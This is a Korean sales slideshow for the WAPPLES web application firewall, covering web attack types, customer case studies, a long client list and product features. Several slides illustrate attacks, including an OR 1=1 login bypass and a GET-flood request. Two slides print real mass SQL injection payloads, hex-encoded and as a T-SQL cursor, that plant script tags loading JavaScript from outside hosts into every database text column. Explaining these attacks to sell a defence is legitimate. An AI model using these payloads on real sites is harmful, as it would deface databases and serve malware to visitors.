Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

201412 wapples 웹방화벽_시온

네트워크보안기술 / 웹방화벽 WAF

  • Be the first to comment

201412 wapples 웹방화벽_시온

  1. 1. 능동형 웹 어플리케이션 방화벽 WAPPLES 소개 상담(구축) 문의 솔루션사업부 이유신 이사 Tel : 070-4685-2648 (대) H/P : 010-2700-2648 E-mail : zion@zionsecurity.co.kr www.zionsecurity.co.kr
  2. 2. - 2 - • 1990년대 이전의 주요 공격 유형 • 형태: 패스워드 추측, 패스워드 크래킹 시스템 공격 1. 해킹 유형 • 2000년대 이전의 주요 공격 유형 • 형태: 세션 하이재킹, 스니핑, 스캔, 서비스 거부 공격 네트워크 공격 • 현재 80%이상의 주요 공격 유형 • 형태: OWASP 10대 공격 위협, 국정원 8대 취약점 웹 어플리케이션 공격 방화벽 대응 장비 IPS, IDS 웹 방화벽 * IDS: Intrusion Detection System (침입 탐지 시스템) * IPS: Intrusion Prevention System (침입 방지 시스템) 웹 방화벽의 필요성I
  3. 3. - 3 - 2. 보안 장비별 탐지사항 웹 방화벽의 필요성I OWASP 10대 항목* 방화벽 IDS / IPS 웹방화벽 A1: Injection X △ O A2: Cross Site Scripting (XSS) X △ O A3: Broken Authentication and Session Management X △ O A4: Insecure Direct Object References X X O A5: Cross Site Request Forgery (CSRF) X X O A6: Security Misconfiguration X X O A7: Insecure Cryptographic Storage X X O A8: Failure to Restrict URL Access X X O A9: Insufficient Transport Layer Protection X O O A10: Unvalidated Redirects and Forwards X X O * OWASP Top Ten Web Application Security Vulnerabilities(2010)
  4. 4. - 4 - • 감염된 웹 서버를 통해 DB 서버 접근, 자료 누출 • 불필요한 트래픽 양성으로 웹 서비스 속도 저하 • 게시판에 악성코드 삽입하여 접속자 컴퓨터 해킹 웹 공격 목적 웹 방화벽의 필요성I 페이지 변조, 24% 정보 훔치기, 19% Malware 심기, 16% 금전적 손실, 13% Downtime, 8% Phishing, 5% 사기, 2% Worm, 1% 스팸 링크, 1% 정보전, 1% THE WEB HACKING INCIDENTS DATABASE 2008 ANNUAL REPORT
  5. 5. - 5 - 웹 방화벽의 필요성I • SQL Injection: 가장 위협적 해킹 기법 • Unknown 29%: 보안시스템 부재 • OWASP Top 10: 실제 발생 빈도와 큰 영향 없음 웹 공격 기법 THE WEB HACKING INCIDENTS DATABASE 2008 ANNUAL REPORT SQL Injection, 30% Unknown , 29% Cross Site Scripting (XSS), 8% CSRF, 3% Others, 30%
  6. 6. - 6 -  강제로 SQL 구문을 삽입, 내부 데이터베이스의 데이터를 유출, 변조 하거나 인증을 우회하 는 공격 SELECT userid FROM logins WHERE name=‘admin’ AND password= ‘abc123 ’ SELECT userid FROM logins WHERE name=‘admin’ OR 1=1;-- AND password= ‘ 웹 방화벽의 필요성I
  7. 7. - 7 - WAPPLES 위치II 웹방화벽 시장 점유율 1위 • 패턴매칭에서 진보된 로직분석 엔진 탑재 • 방화벽 연동을 통한 DDoS 대응 공조 • IPv6 인증, PCI-DSS 등 다양한 인증 획득 지능형 웹방화벽 WAPPLES DB 암호화 시장 점유율 1위 • 오라클, MS SQL, DB2 등 환경지원 • D’Amo SG와 D’Amo SCP로 다양한 환경 지원 • 컬럼단위 암호화로 최적의 속도 지원 DB 암호화 솔루션 D’Amo 행안부 공식 GPKI • NPKI와 GPKI 시스템을 통한 사용자 인증 • 웹세션 암호화 및 인증 솔루션 웹구간 암호화솔루션 ISSAC 통합 인증 솔루션 • 2001년부터 Single Sign On (SSO) 제공 • 엑스트라넷 접속 관리 기반의 RBAC (Role Based Access Control) 암호기능과 보안 서비스 개발툴 • 임베디드 환경 지원 • PC와 메인프레임까지 암호화 지원 PKI 개발툴 SCP SSO & EAM 솔루션 ISign 국정원 검증필 암호모듈 CIS
  8. 8. - 8 - WAPPLES 위치II 2011/04
  9. 9. - 9 - WAPPLES 위치II 2011/05
  10. 10. - 10 - WAPPLES 위치II 2011/06
  11. 11. - 11 - WAPPLES 위치II 2012/03
  12. 12. - 12 - WAPPLES 위치II 2012/06
  13. 13. - 13 - WAPPLES 위치II  외부에 노출된 그룹웨어 및 내부 중요 서버에 대한 보안  개인정보 유출 및 지속적인 자동화된 공격 보호 필요 이중화된 네트워크 지원을 위해 2대 웹방화벽 도입 Active/Standby 구성 및 인라인 방식 구축 업무 처리시 발생되는 웹 어플리케이션 오류 확인 개인정보 유출 경로 파악 조치 자동화된 공격 발생시, 자동으로 블랙리스트 IP관리 기능 활용, URL 접근제어 기능 반영 • 개인정보 유출 / 웹 어플리케이션 오류 URL보호를 통한 신뢰성 제공 • 자동화된 공격 차단으로 인한, 서비스 안전성 및 가용성 증가 • 보안 감사 시 소스코드 수정 등에 비해 TCO 절감 • 내부 중요서버 어플리케이션에 대해, 인가된 사용 자만 접근 가능함에 따라, 내부정보 유출 방지 고객 상황 대응 도입 효과 설치 구성도
  14. 14. - 14 - WAPPLES 위치II  온라인 교육 사이트를 운영하는 웹 서버가 홈페이지 해킹 후 악성코드가 대량으로 배포되어 과도한 부하 발생  컨텐츠를 노린 웹 공격이 중국으로부터 수시로 발생하여 정상적인 서비스 제공에 어려움을 겪음 웹 방화벽을 웹 서버 앞에 인라인 방식으로 설치 로그 분석을 통해 다양한 백도어 발견, 제거 백도어 제거 중 공격자가 설치한 다양한 악성 코 드 설치를 확인하고 이를 제거 중국으로부터의 SQL Injection 공격 등을 웹 방 화벽을 통해 차단 웹 방화벽 운영을 통해 컨텐츠 복사 시도 차단 • 웹 방화벽 설치 전 악성코드의 대량 유포로 인 해 웹 서버의 부하 증가로 수시로 부팅을 했으 나 웹 방화벽 운영 후 부하 증가 현상이 소멸됨 • 악성코드 차단 및 삭제를 통해 서비스를 위한 네트워크 대역폭 확보 • 온라인 교육 사이트의 주요 자산인 컨텐츠 복사 근절 고객 상황 대응 도입 효과 설치 구성도
  15. 15. - 15 - WAPPLES 위치II 서울시청, 국세청, 수력원자력 • 해킹에 의한 시스템 속도 저하 • 고객 정보 누출로 인한 금융사고 국민은행, 현대증권, 원캐싱 • 게시판에 고객 개인 정보 표시 • 페이지 변조 및 정보 누출 여의도 순복음 교회, 아주대병원 서서울CC, 아웃백스테이크 • 성인사이트로 홈페이지 변조 • 게시판을 통한 고객 PC 감염 • 해킹에 의한 고객정보 누출 • 관리자 업무 마비 웹 방화벽 도입 후 개선
  16. 16. - 16 - 구분 구축 사이트 교육기관 • 가야대학교, 경기공업대학교, 경남거창전문대학, 경남도립 남해대학, 경북대학교, 경상교육청, 경상북도교육청, 경주교육청, 계원디자인예술대학, 고령교육청, 교육연구원, 교육정보센터, 구리남양주교육청, 구미교육청, 군위교육청, 금강대학교, 김천교육청, 대구공업대학, 대구광역시교육청교육정보원, 대구교육대학교, 대구산업정보대학교, 문경교육청, 봉화교육청, 부산 동의과학대학, 삼육대학교, 상주교육청, 상지대학교, 세계사이버대학, 순천청암대학, 순천향대학교, 아주대학교, 안동교육청, 안동대학교, 안산1대학, 영남대학교, 영남사이버대학교, 영덕교육청, 영양교육청, 영주교육청, 영천교육청, 예천교육청, 용인 교육청, 울릉교육청, 울진교육청, 육군사관학교, 의성교육청, 조선대학교, 천안연암대학교, 철도대학, 청도교육청, 청송교육청, 충주대학교, 충청대학, 칠곡교육청, 포항교육청, 한국교원대학교, 한국농업대학교, 한국싸이버대학교, 한국폴리텍대학, 해군사관학교 등 공공 및 정부기관 • 건설공제조합, 게임물등급위원회, 경북개발공사, 경북농업기술원, 경북중소기업지원센터, 경상북도중소기업지원센터, 경찰청 생계지원, 경찰청 정보국, 경찰청 CTRC, 경호처, 고창군립도서관, 공군 제7전대(사이버기술통제실), 공군군수사, 공군중앙전산소, 공정거래위원회, 과천시설관리공단, 과천평생교육학습관, 광주정보문화산업진흥원, 광주환경시설관리공단, 국립국어원, 국립국제교육원, 국립농산물품질관리원, 국립문화재연구소, 국립생물자원관, 국립종자원, 국립중앙과학관, 국립중앙도서관, 국립환경과학원, 국립현대미술관, 국민권익처리위워회, 국민체육진흥공단, 국방과학연구소, 국방기술품질원, 국방부 정보전산소, 국방전산소 CERT, 국세청, 국제교류재단, 국제협력단, 국토해양부, 근로복지공단, 농림기술관리센터, 농림부, 농촌진흥청, 대구경북과학기술원, 대구공업대학교, 대구도시공사, 대구북구 구수산도서관, 대구지하철공사, 대구학생문화센터, 대덕연구개발특구지원본부, 대한건설설비협회, 대한주택건설협회, 대한전문건설협회, 도봉구 학마을다사랑도서관, 동북아역사재단, 민주화운동기념사업회, 밀양시립도서관, 법무부, 별정우체국연합회, 보건복지가족부, 부산광역시 기장도서관, 부산도시공사, 부산지방해양항만청, 부산항만공사, 사이버테러대응센타, 사학진흥재단, 산림청, 산업자원부 기술표준원, 산재의료원 , 서울 경찰청, 서울농수산물공사, 서울시 소방재난본부, 서울시정개발연구원, 수원시설관리공단, 식약청, 아랍누리도서관, 안산시설관리공단, 안성시 중앙도서관, 양성평등교육진흥원, 양주꿈나무도서관, 에너지경제연구원, 여성가족부, 여성부, 연천도서관, 연천맑은물사업소, 오산시립중앙도서관, 요업기술원, 외교통상부, 육군복지단, 육군중앙경리단, 의정부시 의회, 의정부시 지식정보센터, 인천공항세관, 인천시서구시설관리공단, 인천시설관리공단, 인천정보산업진흥원, 잠실1동어린이도서관, 재외동포재단, 전기안전연구원, 전문건설공제조합, 전주교통정보센터, 정보통신정책연구원, 주택관리공단, 중소기업청, 충남교육연수원 등 지자체 • 강남구청, 강동구청, 강북구청, 강서구청, 강원도 영월군청, 강원도 인제군청, 강원도 홍천군, 거제시청, 경기도 성남시청, 경기도 안산시청, 경기도 연천군청, 경기도 오산시청, 경기도청, 경기도 화성시청, 경남 고성군청, 경북도청, 경남산청군청, 경남 의령군청, 경남 진주시청, 경남창녕군청, 경북 영양군청, 경북 예천군청, 경주시청, 고령군청, 공주시청, 광진구청, 구로구청, 군위군청, 군포시청, 금천구청, 논산시청, 대구 남구청, 대구광역시청, 대구북구청, 대구서구청, 대전광역시청, 대전대덕구청, 대전서구청, 도봉구청, 동대문구청, 동두천시청, 동작구청, 마포구청, 문경시청, 부산서구청, 사천시청, 서울 중구청, 서울특별시청, 서천군청, 서초구청, 성북구청, 송파구청, 수원시 권선구청, 수원시 영통구청, 수원시 장안구청, 수원시 팔달구청, 수원시청, 양산시청, 양주시청, 양천구청, 양평군청, 영덕군청, 영등포구청, 울산 북구청, 울진군청, 용인시청, 원주시청, 은평구청, 익산시청, 인천계양구청, 인천남동구청, 인천동구청, 인천부평구청, 인천옹진군청, 전남 강진군청, 전남 무주군청, 전남 보성군청, 전남 영암군청, 전남 화순군청, 전북 완주군청, 전북고창군청, 전북군산시청, 전북 덕진군청, 전북도청, 전북장성군청, 전북전주시청, 전북정읍시청, 종로구청, 중랑구청, 천안시청, 청송군청, 충남 금산군청, 충북 단양군청, 충북 제천시청, 충북 청주시청, 충북 충주시청, 칠곡군청, 태안군청, 파주시청, 평택시청, 포천시청, 포항시청, 함안군청 등 금융기관 • 국민은행, 기술보증기금, 리드코프, 스타상호저축은행, 신용보증기금, 원캐싱, 한국경기진흥상호저축은행, 현대증권,신협중앙회 등 일반기업 • 갤럭시아 커뮤니케이션즈, 경북 테크노파크, 넥센타이어, 녹십자, 델리쿡, 동광제약, 디딤돌, 디사이어(보드보드), 룩옵틱스, 미디어윌, 마이스터, 메디슨, 모빌리언스, 보령제약, 부동산 써브, 벽산, 사이버 다임, 서서울CC, 송도테크노파크, 수박씨닷컴, 스카이에듀, 스포츠토토, 소만사, 신세계아이엔씨, 아모제, 아웃백스테이크, 용인흥덕 U- City, 유피온, 인섹시큐리티, 인포바인, 에듀윌, 에스디엔터넷, 엔도어즈, 에이트리, 중소조선연구소, 정상어학원, 정철어학원, 지디시스, 충북 테크노파크, 타임교육홀딩스, 티맥스소프트, 팅크웨어, 태웅, 프레시안, 포스텍, 크라운베이커리, 한국동서발전, 한국 마사회, 한라건설, 한전KDN 전력 IT연구원, 한전KPS, 한화석유화학, 한국 야쿠르트, GS울산방송, JKIT, JTNET, LG히다찌 등 기타 • 고려대학교의료원, 경북대학교병원, 마산삼성병원, 나무병원, 소망교회, 산재의료원, 여의도순복음 교회, 아주대학교병원, 우리들병원 등 WAPPLES 위치II
  17. 17. - 17 - WAPPLES 위치II (2012년 8월 누적기준)
  18. 18. - 18 - Mass SQL Injection Bot 웹방화벽 WAPPLES 소개III  DB에 악성 Java Script 삽입  SQL Injection 공격의 자동화 및 혼합  SQL Injection + Cross Site Scripting  공격의 최종 목적은 웹 서버가 아닌 사용자 브라우저  트로이 목마 또는 키 로거(Key logger) 설치  다중 인코팅 2008-03-29 19:02:41 W3SVC1397586572 211.195.232.19 POST /OOOO/OOOOOO/OOOOOO_OOOOO_view.asp bid=pds_vod&num=51&page=1&od=&ky=&sh=';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300 4C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000430020007600610 … … NVARCHAR(4000));EXEC(@S);-- 80 - 60.172.219.4 Mozilla/3.0+(compatible;+Indy+Library) - - 200 0 0 DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+'‘<script src=http://www.nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor  16진수  string  UTF-8  ASCII
  19. 19. - 19 - Mass SQL Injection 탐지 사례 웹방화벽 WAPPLES 소개III Declare @T Varchar(255), @C Varchar(255) Declare Table_cursor Cursor For Select A.Name,B.Name From Sysobjects A, Syscolumns B Where A.Id = B.Id And A.Xtype='u' And (B.Xtype=99 or B.Xtype=35 or B.Xtype=231 or B.Xtype=167) Open Table_Cursor Fetch Next from table_cursor into @T, @C while (@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar(8000),['+@c+']))+''<script src=http://3b3.org./c.js></script>''') fetch next from table_cursor into @t, @c end close table_cursor deallocate table_cursor
  20. 20. - 20 - Web DDos – GET Flooding 웹방화벽 WAPPLES 소개III  정상적인 페이지 접속 요청(GET method)를 다량 전송  웹서버 과부하를 노린 어플리케이션 공격 형태  7.7 DDos 대란시 네트워크 대역의 30%만 사용하여 웹서비스 중단 사태 발생 GET /servlet/support?pageId=S03&pageState=S1&no=2&n_uid=6947&currentGET HTTP/1.1 Host: www.******.co.kr User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MyIE 3.01)Cache-Control: no-store, must-revalidate Referer: http://www. ******.co.kr Connection: Close
  21. 21. - 21 - 로직 분석 및 다중탐지기법을 통한 HTTP/HTTPS 기반의 웹 공격 방지 1. WAPPLES 기능 (1/4) – 기본 정책을 바탕으로 자유로운 설정 지원 – 정책 편집(추가, 불러오기, 수정) 기능 정책기반 설정 제공 A. 침입 방지 웹방화벽 WAPPLES 소개III 19 20 21 22 23 24 25 26 27 Response Header Filtering SQL Injection IP Block Stealth Commanding Suspicious Access Unicode Directory Traversal URI Access Control User Defined Web Site Defacement 1 2 3 4 5 6 7 8 Buffer Overflow Cookie Poisoning Cross Site Script Directory Listing Error Handling Extension Filtering File Upload Include Injection 9 Input Contents Filtering 10 11 12 13 14 15 16 17 Invalid HTTP Invalid URI IP Filtering Parameter Tampering Privacy File Filtering Privacy Input Filtering Privacy Output Filtering Request Header Filtering 18 Request Method Filtering
  22. 22. - 22 - A. 침입 방지 1. WAPPLES 기능 (2/4) 검증 메커니즘을 통한 개인정보 누출 방지 300여종의 업로드 파일 내의 개인정보 포함 여부 검사 Positive Security/Negative Security 지원 트래픽 분석으로 자동 학습 기능 B. 개인정보 누출방지 C. 편리한 데쉬보드 Docking 기능을 통한 사용자 View 정의 보고서 작성을 위한 복사 및 붙이기 기능 제공 웹방화벽 WAPPLES 소개III
  23. 23. - 23 - 1. WAPPLES 기능 (3/4) 다양한 정보를 시각화 웹방화벽 WAPPLES 소개III 트래픽 통계 (3D Line 그래프) 공격 통계 (Pie Chart) 탐지 로그 C. 편리한 데쉬보드
  24. 24. - 24 - 1. WAPPLES 기능 (4/4) D. 관리 편의성 UI 기간/출발지/URI/국가별 로그 상세 검색 엑셀 형식으로 로그 전송 및 백업/삭제/복구 Wizard 형식의 설정 지원 웹방화벽 WAPPLES 소개III
  25. 25. - 25 - 2. 설치 방식 투명 프락시 방식: 95% 이상 적용 역 프락시 방식 L4 CSLB(Cache Server Load Balancing) 방식  장애 발생시 Bypass 기본 지원  DNS 설정 변경 및 방화벽 Re-Direction 필요  장애 발생시 Bypass 지원 불가 3. 기타 기능 다중의 웹 사이트 지원 복수의 WAPPLES 통합 관리 Update 서버로부터 자동 업데이트 SSL 트래픽 복호화 및 가속 독자 암호 알고리즘 지원 및 웹구간암호화 솔루션 연동 장애 발생시 Bypass mode 지원 웹방화벽 WAPPLES 소개III
  26. 26. - 26 -  중앙센터에서 탐지 통계 취합 – 1,800여대의 로그분석 자료로 통계성 확보  해킹유형 및 공격자 IP 등 전반적인 웹 공격 동향 분석 리포트 제공  보안 이상 동향 파악 및 자동 대처 웹방화벽 WAPPLES 소개III A. 침입 방지I.C.S (Intelligent Customer Support) 업데이트 서버 최종버전 DB통계DB ICS 서버 고객 요청DB탐지로그DB 고객 고객 운용제품 관리자 보안 관리 패치 관리 최종버전 업데이트 기술지원 고객 요청 탐지로그수집보고서비스
  27. 27. - 27 - 인증 및 수상 현황IV 인증 현황  2003.08: NIGT의 FIPS 46-3, FIPS 197 인증 획득  2007.03: 정보통신기술협회(TTA) GS(Good Software) 인증  2008.01: 국가정보원 CC(Common Criteria) EAL4 인증/ 암호모듈(CIS-CC ) 검증필  2009.12: PCI-DSS 준수 인증 획득  2010.04: MAPP(Microsoft Active Protections Program) 가입  2010.10: IPv6 Ready Logo Silver Mark 인증 획득  2011.02: 우수녹색경영(Green Biz) 등급 획득
  28. 28. 감사합니다 Ver. 10.2 상담(구축) 문의 솔루션사업부 이유신 이사 Tel : 070-4685-2648 (대) H/P : 010-2700-2648 E-mail : zion@zionsecurity.co.kr www.zionsecurity.co.kr

×